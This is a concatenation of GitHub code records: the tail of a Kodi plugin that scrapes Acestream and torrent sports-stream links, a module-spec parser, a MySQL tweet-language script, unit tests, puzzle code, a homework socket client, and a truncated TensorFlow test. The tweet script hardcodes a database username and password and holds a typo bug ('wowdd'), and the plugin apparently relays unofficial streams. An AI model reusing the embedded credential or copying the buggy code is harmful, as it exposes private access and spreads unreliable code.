isPlayable=False)\n\n\n\ndef nbaTV(params): ##Lista 4\n \n acotacion = Lista4_AcotaInicio\n acotaFin = Lista4_AcotaFin\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)'+acotaFin) \n canales = plugintools.find_multiple_matches(grupo,'')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n if len(titulo) > 0:\n '''\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n \n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n '''\n mivideo = link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\ndef canales365(params):\n \n acotacion = \"Canales 365\"\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n if len(titulo) > 0:\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\ndef zapping(params):\n \n acotacion = \"a visionar<\"\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n if len(titulo) > 0:\n titu = \"[COLOR white]Canal \" + titulo + \"[/COLOR]\"\n #plugintools.log(\"*****************Titu: \"+titu+\"********************\")\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\n\n\ndef lanza(params):\n mivideo = params.get(\"url\")\n logo = params.get(\"thumbnail\")\n titu = params.get(\"title\")\n titulo = params.get(\"extra\")\n\n xbmc.Player().play(mivideo)\n\n\n\n\n\ndef laLiaste(params):\n\t\n xbmc.Player().play(lasliao)\n l1 = \" [COLOR red]La AGENDA es sólo informativa, NO reproduce enlaces.[/COLOR]\"+\"\\n\"+\"\\n\"\n l2 = \"Localice el evento, tome nota del canal en que se va a ver...\"+\"\\n\"\n l3 = \"vuelva al Menú Principal y busque el canal en sus Carpetas.\"\n mensaje = l1+l2+l3\n xbmcgui.Dialog().ok( \"[COLOR lime]¡¡¡INCORRECTO!!![/COLOR]\" , mensaje )\n\n\n\n\ndef salida(params):\n\n\txbmc.executebuiltin('ActivateWindow(10000,return)')\n\t\n\n\n\n\t\n\n\n\t\n\n\n\t\t\nrun()\n\n\t\t\n\n\n\n\n\t\n\n","repo_name":"GargantuaMC/gamece","sub_path":"plugin.video.FutbolTream/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":27024,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"43849592249","text":"\"\"\"cairn.sysdefs.ModuleSpec - Module specification string parser\"\"\"\n\n\n#\n# Syntax. Spaces are removed.\n#\n# string -- Letters, numbers and '_'. ';' seperates words. '\"\"' can combine\n# words. Nested '\"\"' are not allowed. Wrapping '/' around the\n# lefthand string turns it into a regular expression. Wrapping\n# '{}' around the right hand string turns it into code that is\n# inserted into a module template and placed into the list.\n#\n# string(arg1=val1, arg2=val2, ...) -- Give a module these parameters\n# string1=string2 -- Replace 'string1' with 'string2'\n# string1string2 -- Insert 'string2' after 'string1'\n# -string -- Remove 'string' from the default\n# ^string -- Prepend 'string' onto the default\n# $string -- Append 'string' onto the default\n# ..string -- Make this module look from the top level, not current\n#\n\n\nimport re\nimport string\nimport shlex\n\nimport cairn\nfrom cairn import Options\n\n\n# Node Type\nUNKNOWN = 0\nIDENTIFIER = 1\nUSER_MOD_PY = 2\nUSER_MOD_SHELL = 3\nMOD_PARAMS = 4\nREGEX = 5\n\n# Node Op Type\nUNARY = 1\nBINARY = 2\nNO_OP = 3\n\n# Operators\nBINARY_OPS = [\"=\", \"<\", \">\"];\nUNARY_OPS = [\"-\", \"^\", \"$\"];\n\nQUOTES = [\"\\\"\", \"'\", \"/\", \"?\"]\nASYM_QUOTES = [\"(\", \")\", \"{\", \"}\", \"[\", \"]\"]\nASYM_QUOTES_LHS = [\"(\", \"{\", \"[\"]\nASYM_QUOTES_RHS = [\")\", \"}\", \"]\"]\nQUOTES_GROUPED = {\")\":\"(\", \"}\":\"{\", \"]\":\"[\", \"\\\"\":\"\\\"\", \"'\":\"'\", \"/\":\"/\",\n\t\t\t\t \"?\":\"?\"}\n\n\nclass ModuleInfo(object):\n\tdef __init__(self, **args):\n\t\tself.type = None\n\t\tself.opType = None\n\t\tself.lhs = None\n\t\tself.rhs = None\n\t\tself.op = None\n\t\tself.regex = None\n\t\tself.name = None\n\t\tself.module = None\n\t\tself.args = {}\n\n\t\tif \"type\" in args:\n\t\t\tself.type = args[\"type\"]\n\t\tif \"opType\" in args:\n\t\t\tself.opType = args[\"opType\"]\n\t\tif \"lhs\" in args:\n\t\t\tself.lhs = args[\"lhs\"]\n\t\tif \"rhs\" in args:\n\t\t\tself.rhs = args[\"rhs\"]\n\t\tif \"op\" in args:\n\t\t\tself.op = args[\"op\"]\n\t\tif \"regex\" in args:\n\t\t\tself.regex = args[\"regex\"]\n\t\tif \"name\" in args:\n\t\t\tself.name = args[\"name\"]\n\t\tif \"module\" in args:\n\t\t\tself.module = args[\"module\"]\n\t\tif \"args\" in args:\n\t\t\tself.args = args[\"args\"]\n\t\treturn\n\n\n\tdef copy(self, rhs):\n\t\tself.type = rhs.type\n\t\tself.opType = rhs.opType\n\t\tself.lhs = rhs.lhs\n\t\tself.rhs = rhs.rhs\n\t\tself.op = rhs.op\n\t\tself.regex = rhs.regex\n\t\tself.name = rhs.name\n\t\tself.module = rhs.module\n\t\tself.args = rhs.args\n\t\treturn\n\n\n\tdef getValue(self):\n\t\tif self.lhs and ((self.opType == UNARY) or (self.opType == NO_OP)):\n\t\t\treturn self.lhs\n\t\telif self.rhs and (self.opType == BINARY):\n\t\t\treturn self.rhs\n\n\n\tdef getNames(self):\n\t\tval = self.getValue()\n\t\treturn val.split(\";\")\n\n\n\tdef __str__(self):\n\t\tstr = \"ModuleSpec.ModuleInfo: type = %s opType = %s lhs = '%s' rhs = '%s' \"\n\t\tstr = str + \"op = '%s' regex = '%s'\"\n\t\tstr = str % (typeToStr(self.type), opTypeToStr(self.opType), self.lhs,\n\t\t\t\t\t self.rhs, self.op, self.regex)\n\t\treturn str\n\n\ndef parseModuleSpec(sysdef, moduleSpec, userModuleSpec, prefix):\n\tcairn.devel(\"Parsing module spec: spec='%s' prefix='%s'\" % (moduleSpec, prefix))\n\tmodules = splitModuleSpec(moduleSpec, prefix)\n\tcairn.devel(\"System module spec:\")\n\tfor mod in modules:\n\t\tcairn.devel(\" %s\" % mod)\n\tif userModuleSpec:\n\t\tuserModuleNames = splitModuleSpec(userModuleSpec, None)\n\t\tcairn.devel(\"User module spec:\")\n\t\tfor mod in userModuleNames:\n\t\t\tcairn.devel(\" %s\" % mod)\n\t\tapplySpec(modules, userModuleNames)\n\t\tcairn.devel(\"Combined spec:\")\n\t\tfor mod in modules:\n\t\t\tcairn.devel(\" %s\" % mod)\n\treturn modules\n\n\ndef splitModuleSpec(moduleSpec, prefix):\n\tstr = moduleSpec.replace(\" \", \"#\")\n\tstr = str.replace(\"\t\", \"#\")\n\tstr = str + \";\"\n\tlexer = shlex.shlex(str, None, True)\n\tlexer.wordchars = lexer.wordchars + \".\"\n\tlexer.commenters = \"\"\n\tlexer.whitespace = lexer.whitespace.replace(\"\\n\", \"\")\n\tlexer.quotes = \"\"\n\tparsing = True\n\tcurInfo = None\n\tnodes = []\n\twhile parsing:\n\t\t(token, ttype) = nextToken(lexer)\n\t\tif not token:\n\t\t\tbreak\n\t\tif (token == \";\"):\n\t\t\tif curInfo:\n\t\t\t\tif ((curInfo.type == IDENTIFIER) and not curInfo.op and\n\t\t\t\t\tcurInfo.lhs):\n\t\t\t\t\tcurInfo.opType = NO_OP\n\t\t\t\t\tnodes.append(curInfo)\n\t\t\t\t\tcurInfo = None\n\t\t\t\telse:\n\t\t\t\t\traise cairn.Exception(\"Parse error, unexpected ';'\")\n\t\telif (token == \"#\") or (token == \"\\n\"):\n\t\t\tcontinue\n\t\telif not curInfo:\n\t\t\tif (ttype == IDENTIFIER) and (token in UNARY_OPS):\n\t\t\t\top = token\n\t\t\t\t(token, ttype) = nextToken(lexer)\n\t\t\t\tif (ttype == UNKNOWN):\n\t\t\t\t\traise cairn.Exception(\"Parse error, invalid token '%s' after '%s'\" % (token, op))\n\t\t\t\tif ttype == REGEX:\n\t\t\t\t\tcurInfo = ModuleInfo(type=IDENTIFIER, opType=UNARY, op=op,\n\t\t\t\t\t\t\t\t lhs=token, regex=True)\n\t\t\t\telse:\n\t\t\t\t\tcurInfo = ModuleInfo(type=ttype, opType=UNARY, op=op, lhs=token)\n\t\t\t\tnodes.append(curInfo)\n\t\t\t\tcurInfo = None\n\t\t\telse:\n\t\t\t\tif ttype == REGEX:\n\t\t\t\t\tcurInfo = ModuleInfo(type=IDENTIFIER, lhs=token, regex=True)\n\t\t\t\telse:\n\t\t\t\t\tcurInfo = ModuleInfo(type=ttype, lhs=token)\n\t\telse:\n\t\t\tif not curInfo.op:\n\t\t\t\tif ttype != IDENTIFIER:\n\t\t\t\t\traise cairn.Exception(\"Parse error, expected binary operator\")\n\t\t\t\tif not token in BINARY_OPS:\n\t\t\t\t\traise cairn.Exception(\"Parse error, invalid binary operator: %s\" % token)\n\t\t\t\tcurInfo.op = token\n\t\t\t\tcurInfo.opType = BINARY\n\t\t\telif curInfo.opType == BINARY:\n\t\t\t\tif ttype == REGEX:\n\t\t\t\t\traise cairn.Exception(\"Parse err, found regex '%s' when expected identifier\" % token)\n\t\t\t\tcurInfo.rhs = token\n\t\t\t\tcurInfo.type = ttype\n\t\t\t\tnodes.append(curInfo)\n\t\t\t\tcurInfo = None\n\tif prefix:\n\t\tapplyPrefix(nodes, prefix)\n\treturn nodes\n\n\ndef nextToken(lexer):\n\ttoken = lexer.get_token()\n\tif token == \"/\":\n\t\tid = matchToken(lexer, \"/\")\n\t\tif not id:\n\t\t\traise cairn.Exception(\"Parse error, invalid regex in module name\")\n\t\treturn (id, REGEX)\n\telif token == \"(\":\n\t\tid = matchToken(lexer, \"(\")\n\t\tif not id:\n\t\t\traise cairn.Exception(\"Parse error, invalid '()' in module name\")\n\t\treturn (id, USER_MOD_PY)\n\telif token == \"{\":\n\t\tid = matchToken(lexer, \"{\")\n\t\tif not id:\n\t\t\traise cairn.Exception(\"Parse error, invalid user shell module '{}'\")\n\t\treturn (id, USER_MOD_SHELL)\n\telif token == \"[\":\n\t\tid = matchToken(lexer, \"[\")\n\t\tif not id:\n\t\t\traise cairn.Exception(\"Parse error, invalid user python module '[]'\")\n\t\treturn (id, USER_MOD_PY)\n\telse:\n\t\treturn (token, IDENTIFIER)\n\n\ndef matchToken(lexer, match):\n\ttoken = lexer.get_token()\n\tid = \"\"\n\tstack = [match]\n\tescaped = False\n\tif match in QUOTES:\n\t\texactMatch = match\n\telse:\n\t\texactMatch = None\n\twhile token and len(stack):\n\t\tif (token == \"\\\\\"):\n\t\t\tif escaped:\n\t\t\t\tescaped = False\n\t\t\telse:\n\t\t\t\tescaped = True\n\t\telif escaped:\n\t\t\tescaped = False\n\n\t\tif not escaped:\n\t\t\tif token == exactMatch:\n\t\t\t\tstack.pop()\n\t\t\t\texactMatch = None\n\t\t\telif (not exactMatch) and (token in QUOTES):\n\t\t\t\tstack.append(token)\n\t\t\t\texactMatch = token\n\t\t\telif (not exactMatch) and (token in ASYM_QUOTES_LHS):\n\t\t\t\tstack.append(token)\n\t\t\telif (not exactMatch) and (token in ASYM_QUOTES):\n\t\t\t\tpopped = False\n\t\t\t\tlhs = QUOTES_GROUPED[token]\n\t\t\t\tif lhs:\n\t\t\t\t\tsize = len(stack)\n\t\t\t\t\tindex = 0\n\t\t\t\t\twhile size + index >= 0:\n\t\t\t\t\t\tindex = index - 1\n\t\t\t\t\t\tif (stack[index + size] == lhs):\n\t\t\t\t\t\t\twhile index < 0:\n\t\t\t\t\t\t\t\tstack.pop()\n\t\t\t\t\t\t\t\tindex = index + 1\n\t\t\t\t\t\t\tpopped = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif not popped:\n\t\t\t\t\t\tstack.append(token)\n\t\t\t\telse:\n\t\t\t\t\tstack.append(token)\n\t\tif len(stack):\n\t\t\tif token == \"#\":\n\t\t\t\tid = id + \" \"\n\t\t\telse:\n\t\t\t\tid = id + token\n\t\t\ttoken = lexer.get_token()\n\t\telse:\n\t\t\tbreak\n\tif not token:\n\t\treturn None\n\treturn id\n\n\ndef applyPrefix(nodes, prefix):\n\tfor node in nodes:\n\t\tif (node.type == USER_MOD_PY) or (node.type == USER_MOD_SHELL):\n\t\t\tcontinue\n\t\tif node.lhs and ((node.opType == UNARY) or (node.opType == NO_OP)):\n\t\t\tnode.lhs = splitApplyPrefix(node.lhs, prefix)\n\t\telif node.rhs and (node.opType == BINARY):\n\t\t\tnode.rhs = splitApplyPrefix(node.rhs, prefix)\n\treturn\n\n\ndef splitApplyPrefix(inStr, prefix):\n\tstrs = inStr.split(\";\")\n\toutStr = \"\"\n\tfor str in strs:\n\t\tstr = str.strip()\n\t\tif str.startswith(\"..\"):\n\t\t\toutStr = \"%s;%s\" % (outStr, str.lstrip(\"..\"))\n\t\telse:\n\t\t\toutStr = \"%s;%s.%s\" % (outStr, prefix, str)\n\treturn outStr.lstrip(\";\")\n\n\ndef applySpec(moduleNames, userModuleNames):\n\tfor userModule in userModuleNames:\n\t\tif (userModule.op == \"=\"):\n\t\t\tapplyReplace(moduleNames, userModule)\n\t\telif (userModule.op == \"<\") or (userModule.op == \">\"):\n\t\t\tapplyInsert(moduleNames, userModule)\n\t\telif (userModule.op == \"-\"):\n\t\t\tapplyRemove(moduleNames, userModule)\n\t\telif (userModule.op == \"^\"):\n\t\t\tapplyPrepend(moduleNames, userModule)\n\t\telif (userModule.op == \"$\"):\n\t\t\tapplyAppend(moduleNames, userModule)\n\t\telif not userModule.op:\n\t\t\tcontinue\n\t\telse:\n\t\t\traise cairn.Exception(\"Unknown operator: %s\" % userModule.op)\n\n\ndef makeRE(module):\n\tif module.regex:\n\t\tname = module.lhs\n\telse:\n\t\tname = \"^%s$\" % module.lhs\n\tcairn.debug(\"makeRE: %s\" % name)\n\treturn re.compile(name)\n\n\ndef applyReplace(moduleNames, userModule):\n\tre = makeRE(userModule)\n\tfor i, v in enumerate(moduleNames):\n\t\tif re.search(v.getValue()):\n\t\t\tmoduleNames[i] = userModule\n\t\t\tbreak\n\treturn\n\n\ndef applyInsert(moduleNames, userModule):\n\tif (userModule.op == \"<\"):\n\t\tbefore = True\n\telse:\n\t\tbefore = False\n\tre = makeRE(userModule)\n\tfor i, v in enumerate(moduleNames):\n\t\tif re.search(v.getValue()):\n\t\t\tif before:\n\t\t\t\tmoduleNames.insert(i, userModule)\n\t\t\telse:\n\t\t\t\tmoduleNames.insert(i+1, userModule)\n\t\t\tbreak\n\treturn\n\n\ndef applyRemove(moduleNames, userModule):\n\tre = makeRE(userModule)\n\tfor i, v in enumerate(moduleNames):\n\t\tif re.search(v.getValue()):\n\t\t\tmoduleNames.remove(v)\n\t\t\tbreak\n\treturn\n\n\ndef applyPrepend(moduleNames, userModule):\n\tmoduleNames.insert(0, userModule)\n\treturn\n\n\ndef applyAppend(moduleNames, userModule):\n\tmoduleNames.append(userModule)\n\treturn\n\n\ndef typeToStr(ttype):\n\tif ttype == UNKNOWN:\n\t\treturn \"UNKNOWN\"\n\tif ttype == IDENTIFIER:\n\t\treturn \"IDENTIFIER\"\n\tif ttype == USER_MOD_PY:\n\t\treturn \"USER_MOD_PY\"\n\tif ttype == USER_MOD_SHELL:\n\t\treturn \"USER_MOD_SHELL\"\n\tif ttype == MOD_PARAMS:\n\t\treturn \"MOD_PARAMS\"\n\tif ttype == REGEX:\n\t\treturn \"REGEX\"\n\treturn \"UNDEFINED\"\n\n\ndef opTypeToStr(opType):\n\tif opType == UNARY:\n\t\treturn \"UNARY\"\n\tif opType == BINARY:\n\t\treturn \"BINARY\"\n\tif opType == NO_OP:\n\t\treturn \"NO_OP\"\n\treturn \"UNDEFINED\"\n","repo_name":"redshodan/cairn","sub_path":"src/python/cairn/sysdefs/ModuleSpec.py","file_name":"ModuleSpec.py","file_ext":"py","file_size_in_byte":10091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34704635898","text":"from pymongo import MongoClient\nimport mysql.connector\nfrom lxml import html\nimport numpy as np\nimport traceback\nfrom re import *\nimport operator\nimport requests\nimport MySQLdb\nimport twython\nimport twython\nimport logging\nimport codecs\nimport json\nimport time\nimport os\nimport re \ndate = time.strftime(\"%Y%m%d\")\ndate = \"20200814\"\nuser_dict = {}\ndbm = mysql.connector.connect(host='localhost',\n user='rmacy',\n passwd='RWM3cyrus',\n db='Elite_Weekly')\ncursor = dbm.cursor()\n\ncommand = \"SELECT DISTINCT user_id,lang,COUNT(tweet_id) FROM Elite_Weekly.tweet_%s GROUP BY user_id,lang;\" % date\nprint (command)\ncursor.execute(command)\nresults = cursor.fetchall()\nfor i in range(len(results)):\n results[i] = re.sub(r'\\(u\\'([0-9]*)\\', u\\'([a-z]*)\\', ([0-9]*)\\)', r'\\g<1> \\g<2> \\g<3>', str(results[i]))\n #print(results[i]) #parse out the pieces needed, for instance results[i][2] has 508) with a trailing parenthesis\n \n results[i] = results[i].split()\n #print(results[i])\n #print(results[i][0])\n\n wow = results[i][0]\n templen = len(wow)-2\n wow = wow[2:templen]\n results[i][0] = wowdd\n \n languages = results[i][1]\n templen2 = len(languages)-2\n languages = languages[1:templen2]\n results[i][1] = languages\n\n counter = results[i][2]\n templen3 = len(counter)-1\n counter = counter[0:templen3]\n results[i][2] = counter\n\n print(results[i][0])\n print(results[i][1])\n print(results[i][2])\n results[i][2] = int(results[i][2])\n print(results[i][2])\n if(results[i][0] not in user_dict.keys()):\n user_dict[results[i][0]] = [results[i][1], results[i][2]]\n print(user_dict[results[i][0]])\n elif(user_dict[results[i][0]][1] < results[i][2]):\n user_dict[results[i][0]] = [results[i][1], results[i][2]]\n print(user_dict[results[i][0]])\n\n\ncommand = \"SELECT DISTINCT user_id,COUNT(tweet_id) FROM Elite_Weekly.tweet_%s GROUP BY user_id;\" %date\nprint (command)\ncursor.execute(command)\nuser_tweet_counts = cursor.fetchall()\nfor i in range(len(user_tweet_counts)):\n user_tweet_counts[i] = re.sub(r'\\(u\\'([0-9]*)\\', ([0-9]*)\\)', r'\\g<1> \\g<2>', str(user_tweet_counts[i]))\n user_tweet_counts[i] = user_tweet_counts[i].split()\n\n first_param = user_tweet_counts[i][0]\n length = len(first_param)-2\n first_param = first_param[2:length]\n user_tweet_counts[i][0] = first_param\n\n #print(user_tweet_counts[i][0])\n\n second_param = user_tweet_counts[i][1]\n length = len(second_param)-1\n second_param = second_param[0:length]\n user_tweet_counts[i][1] = second_param\n\n user_tweet_counts[i][1] = int(user_tweet_counts[i][1])\n user_dict[user_tweet_counts[i][0]][1] = float(user_dict[user_tweet_counts[i][0]][1])/float(user_tweet_counts[i][1])\n\nlanguage_file = 'top12k_languages_' + date\nl_f = open(language_file, 'w')\nfor user in user_dict.keys():\n for i in range(len(user_dict[user])):\n user_dict[user][i] = str(user_dict[user][i])\n l_f.write(str(user) + ',' + ','.join(user_dict[user]) + '\\n')\nl_f.close()\nprint(\"done\")","repo_name":"eugenetan3/ONRG-REU","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"658010747","text":"\"\"\"\r\ntest furnishings.py and the various\r\nbits of furniture defined there.\r\n\"\"\"\r\nimport unittest\r\nfrom furnishings import Furnishing, Sofa, Bookshelf, Bed, Table, map_the_home, counter\r\n\r\nclass TestFurnishings(unittest.TestCase):\r\n def test_furniture(self):\r\n \"Basic test of classes derived from Furnishing\"\r\n furnishing = Furnishing(\"Kitchen\")\r\n sofa = Sofa('Living Room')\r\n bookshelf = Bookshelf('Library')\r\n bed = Bed('Bedroom')\r\n table = Table('Dining Room')\r\n self.assertEqual(furnishing.room, 'Kitchen')\r\n self.assertEqual(sofa.room, 'Living Room')\r\n self.assertEqual(bookshelf.room, 'Library')\r\n self.assertEqual(bed.room, 'Bedroom')\r\n self.assertEqual(table.room, 'Dining Room')\r\n \r\n self.assertEqual(sofa.name, 'Sofas')\r\n self.assertEqual(bookshelf.name, 'Bookshelves')\r\n self.assertEqual(bed.name, 'Beds')\r\n self.assertEqual(table.name, 'Tables')\r\n \r\n def test_map_the_home(self):\r\n # make sure it handles objects not derived from Furnishing\r\n home = [Bed('Bedroom'), 1, [1,2,3]]\r\n with self.assertRaises(AttributeError):\r\n map_the_home(home)\r\n \r\n # works as expected\r\n home = [Bed('Bedroom'), Sofa('Living Room')]\r\n result = map_the_home(home)\r\n self.assertTrue(isinstance(result['Bedroom'][0], Bed))\r\n self.assertTrue(isinstance(result['Living Room'][0], Sofa))\r\n \r\n def test_counter(self):\r\n # make sure it handles objects not derived from Furnishing\r\n home = [Bed('Bedroom'), 1, [1,2,3]]\r\n with self.assertRaises(AttributeError):\r\n counter(home)\r\n \r\n # works as expected \r\n home = [Bed('Bedroom'), Sofa('Living Room')]\r\n expected = \"Beds: 1\\nBookshelves: 0\\nSofas: 1\\nTables: 0\"\r\n self.assertEqual(counter(home), expected)\r\n \r\nif __name__ == \"__main__\":\r\n unittest.main()","repo_name":"rwehner/rl","sub_path":"homework/Python3_Homework07/src/test_furnishings.py","file_name":"test_furnishings.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"27193217217","text":"import fileinput\nimport re\nfrom collections import defaultdict\n\nsquares = defaultdict(int)\nlines = [line for line in fileinput.input()]\nfor line in lines:\n claim, x, y, width, height = (int(n) for n in re.findall('(\\d+)', line))\n for i in range(width):\n for j in range(height):\n squares[x + i, y + j] += 1\n\nprint(sum(x > 1 for x in squares.values()))\n","repo_name":"folkol/adventofcode","sub_path":"2018/day3/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24050522371","text":"import socket\nfrom struct import *\nimport math\n\n\n\n############################################### Part1 ################################################\n# Stage a\n\n# Step a1\n# server = \"attu2.cs.washington.edu\"\nserver = \"localhost\"\nport = 12235 # UDP port\nstudentNum = 243 # last 3 digits of my student number\nmessage = pack(\">IIHH12s\", 12, 0, 1, studentNum, bytes(\"hello world\", 'ascii'))\nprint(\"a1 sent: \", message)\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(message, (server, port))\n\npacket = sock.recv(28)\nprint(\"a2 receive: \", unpack(\">IIHHIIII\", packet))\npayload_len, psecret, step, student, num, len_b, udp_port, secretA = unpack(\">IIHHIIII\", packet)\n\n# Stage b\npacket_id = 0\nwhile packet_id < num:\n padded_len = str(int((len_b + 3) / 4) * 4)\n temp = \">IIHHI\" + padded_len + \"s\"\n message = pack(temp, len_b + 4, secretA, 1, studentNum, packet_id, bytes(0))\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.sendto(message, (server, udp_port))\n sock.settimeout(0.5)\n try:\n packet = sock.recv(16)\n except socket.timeout:\n continue\n payload_len, psecret, step, student, ack = unpack(\">IIHHI\", packet)\n if (ack == packet_id) :\n packet_id = packet_id + 1\n\npacket = sock.recv(20)\nprint(\"b receive: \", unpack(\">IIHHII\", packet))\npayload_len, psecret, step, student, tcp_port, secretB = unpack(\">IIHHII\", packet)\n\n# Stage c\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((server, tcp_port))\npacket = sock.recv(28)\nprint(\"c receive: \", unpack(\">IIHHIIIc\", packet[:25]))\npayload_len, psecret, step, student, num2, len2, secretC, c = unpack(\">IIHHIIIc\", packet[:25])\n\n# Stage d\nfor i in range(num2):\n p_length = math.ceil(len2 / 4) * 4\n temp = \">IIHH\" + str(p_length) + \"s\"\n message = pack(temp, len2, secretC, 1, studentNum, c * p_length)\n # print(len(message), message)\n sock.send(message)\n\npacket = sock.recv(16)\nprint(\"d receive: \", unpack(\">IIHHI\", packet[:16]))\npayload_len, psecret, step, student, secretD = unpack(\">IIHHI\", packet[:16])\n\nprint(secretA, secretB, secretC, secretD)\n","repo_name":"szbslsx/CSE461","sub_path":"hw1/part1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23097829352","text":"from absl.testing import parameterized\nimport numpy as np\nimport tensorflow as tf, tf_keras\nfrom official.recommendation.uplift import keras_test_case\nfrom official.recommendation.uplift import types\nfrom official.recommendation.uplift.metrics import treatment_fraction\n\n\nclass TreatmentFractionTest(\n keras_test_case.KerasTestCase, parameterized.TestCase\n):\n\n def _get_y_pred(\n self, is_treatment: tf.Tensor\n ) -> types.TwoTowerTrainingOutputs:\n # Only the is_treatment tensor is required for testing.\n return types.TwoTowerTrainingOutputs(\n shared_embedding=tf.ones_like(is_treatment),\n control_predictions=tf.ones_like(is_treatment),\n treatment_predictions=tf.ones_like(is_treatment),\n uplift=tf.ones_like(is_treatment),\n control_logits=tf.ones_like(is_treatment),\n treatment_logits=tf.ones_like(is_treatment),\n true_logits=tf.ones_like(is_treatment),\n is_treatment=is_treatment,\n )\n\n @parameterized.named_parameters(\n {\n \"testcase_name\": \"unweighted\",\n \"is_treatment\": tf.constant([[True], [False], [True], [False]]),\n \"sample_weight\": None,\n \"expected_result\": 0.5,\n },\n {\n \"testcase_name\": \"weighted\",\n \"is_treatment\": tf.constant(\n [[True], [False], [True], [True], [False]]\n ),\n \"sample_weight\": tf.constant([0.5, 0.5, 0, 0.7, 1.8]),\n \"expected_result\": np.average(\n [1, 0, 1, 1, 0], weights=[0.5, 0.5, 0, 0.7, 1.8]\n ),\n },\n {\n \"testcase_name\": \"only_control\",\n \"is_treatment\": tf.constant([[False], [False], [False]]),\n \"sample_weight\": tf.constant([1, 0, 1]),\n \"expected_result\": 0.0,\n },\n {\n \"testcase_name\": \"only_treatment\",\n \"is_treatment\": tf.constant([[True], [True], [True]]),\n \"sample_weight\": tf.constant([0, 1, 1]),\n \"expected_result\": 1.0,\n },\n {\n \"testcase_name\": \"one_entry\",\n \"is_treatment\": tf.constant([True]),\n \"sample_weight\": None,\n \"expected_result\": 1.0,\n },\n {\n \"testcase_name\": \"no_entry\",\n \"is_treatment\": tf.constant([], dtype=tf.bool),\n 